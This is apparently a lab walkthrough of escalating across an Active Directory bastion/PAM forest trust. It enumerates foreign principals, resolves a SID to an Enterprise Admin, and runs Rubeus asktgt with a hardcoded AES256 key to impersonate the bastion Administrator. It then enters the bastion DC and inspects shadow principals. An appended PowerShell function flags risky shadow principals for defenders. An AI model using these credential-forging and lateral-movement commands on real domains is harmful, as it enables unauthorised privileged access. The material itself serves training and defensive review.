First, let’s enumerate the foreign principals
Find-ForeignGroup -Verbose -Domain bastion.local

The output shows a SID that has been added to the domain local Administrators group in the bastion.local domain.
Now let’s convert the SID to a username
$SID = New-Object System.Security.Principal.SecurityIdentifier("S-1-5-21-2781415573-3701854478-2406986946-500")
$User = $SID.Translate([System.Security.Principal.NTAccount])
$User.Value

Notice that the username added to the domain local Administrators group in the bastion.local domain is Techcorp\Administrator, the Enterprise Admin of the techcorp.local domain.
Now let’s start a new process as the bastion Administrator
.\Rubeus.exe asktgt /user:Administrator /domain:bastion.local /aes256:a32d8d07a45e115fa499cf58a2d98ef5bf49717af58bc4961c94c3c95fc03292 /dc:bastion-dc.bastion.local /createnetonly:C:\Windows\System32\cmd.exe /show

Now let’s enter the bastion-dc server
Enter-PSSession -ComputerName bastion-dc.bastion.local

Now let’s check the PAM trust with production.local
Get-ADTrust -Filter {(ForestTransitive -eq $True) -and (SIDFilteringQuarantined -eq $False)} -Server production.local

Now let’s validate by searching for shadow principals
Get-ADObject -SearchBase ("CN=Shadow Principal Configuration,CN=Services," + (Get-ADRootDSE).configurationNamingContext) -Filter * -Properties * | select Name,member,msDS-ShadowPrincipalSid | fl
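
The same shadow principal query can be turned into a defender-side review that flags every shadow principal whose msDS-ShadowPrincipalSid maps to a well-known privileged RID and that has members. This is an added example, not part of the original walkthrough; the function name Get-ShadowPrincipalRisk, the sample object names and the sample SIDs are constructed for illustration.

```powershell
# Added example: classify shadow principals by the RID of the SID they shadow.
# Well-known domain-relative RIDs (string keys avoid integer-width issues).
$PrivilegedRids = @{
    '500' = 'Built-in Administrator'
    '512' = 'Domain Admins'
    '518' = 'Schema Admins'
    '519' = 'Enterprise Admins'
}

function Get-ShadowPrincipalRisk {   # hypothetical helper name
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline)]
        [object]$ShadowPrincipal
    )
    process {
        # Get-ADObject returns a SecurityIdentifier here; the samples below use strings.
        $sidText = [string]$ShadowPrincipal.'msDS-ShadowPrincipalSid'
        $sid     = New-Object System.Security.Principal.SecurityIdentifier($sidText)
        $rid     = ($sid.Value -split '-')[-1]
        $members = @($ShadowPrincipal.member | Where-Object { $_ })
        $label   = if ($PrivilegedRids.ContainsKey($rid)) { $PrivilegedRids[$rid] } else { 'Other' }

        [pscustomobject]@{
            Name        = $ShadowPrincipal.Name
            ShadowedSid = $sid.Value
            DomainSid   = $sid.AccountDomainSid.Value
            MapsTo      = $label
            MemberCount = $members.Count
            Members     = $members -join '; '
            # Review when a privileged identity is shadowed and someone holds it.
            Review      = ($label -ne 'Other' -and $members.Count -gt 0)
        }
    }
}

# Constructed sample objects shaped like the Get-ADObject output (not real data).
$sample = @(
    [pscustomobject]@{ Name = 'sample-ea-shadow'
        member = @('CN=Administrator,CN=Users,DC=bastion,DC=local')
        'msDS-ShadowPrincipalSid' = 'S-1-5-21-1111111111-2222222222-3333333333-519' }
    [pscustomobject]@{ Name = 'sample-helpdesk-shadow'
        member = @()
        'msDS-ShadowPrincipalSid' = 'S-1-5-21-1111111111-2222222222-3333333333-1604' }
)
$sample | Get-ShadowPrincipalRisk | Format-Table Name, MapsTo, MemberCount, Review -AutoSize

# Live use (requires the ActiveDirectory module): pipe the Get-ADObject query
# shown above, without the select/fl stages, into Get-ShadowPrincipalRisk.
```

Rows with Review set to True are the ones to compare against the approved list of PAM mappings for the bastion forest.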